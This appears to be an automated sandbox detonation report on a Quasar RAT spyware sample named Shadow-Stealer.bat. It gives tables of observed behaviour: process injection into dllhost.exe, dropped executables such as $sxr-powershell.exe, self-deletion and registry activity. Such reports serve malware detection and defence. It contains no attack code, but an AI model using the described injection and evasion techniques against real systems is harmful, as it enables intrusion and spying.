Malware Analysis Report

2024-10-19 06:33

Sample ID: 240528-k1tfysee89
Target: Shadow-Stealer.bat
SHA256: 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags: quasar v2.2.6 | tinsler spyware trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

Threat Level: Known bad

The file Shadow-Stealer.bat was found to be: Known bad.

Malicious Activity Summary

quasar v2.2.6 | tinsler spyware trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar RAT

Quasar payload

Suspicious use of NtCreateProcessExOtherParentProcess

Deletes itself

Executes dropped EXE

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Enumerates system info in registry

Kills process with taskkill

Checks processor information in registry

Uses Task Scheduler COM API

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-28 09:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-28 09:04
Reported: 2024-05-28 09:35
Platform: win11-20240508-en
Max time kernel: 1800s
Max time network: 1803s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Suspicious use of NtCreateProcessExOtherParentProcess

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4512 created 6000 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3884 created 5520 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 5724 created 5836 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |

Deletes itself

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |

Drops file in System32 directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |

Suspicious use of SetThreadContext

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1904 set thread context of 4988 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 1904 set thread context of 2076 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 1932 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 2864 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 1684 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 892 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 1904 set thread context of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 1904 set thread context of 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 1604 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 5628 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 5728 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 5280 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 3892 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 6000 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 6128 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 5520 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3264 set thread context of 5836 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 3264 set thread context of 5516 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe |

Drops file in Windows directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |

Enumerates physical storage devices

Checks processor information in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |

Enumerates system info in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |

Kills process with taskkill

evasion
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |

Modifies data under HKEY_USERS

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={9978C964-30BF-4865-8D88-D53FC5CFA57E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887200" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:06:42 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |

Modifies registry class

| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = ":BackgroundTransferApi:" | C:\Windows\system32\DllHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi" | C:\Windows\system32\DllHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = [value removed] | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup" | C:\Windows\system32\DllHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab" | C:\Windows\System32\RuntimeBroker.exe | N/A |
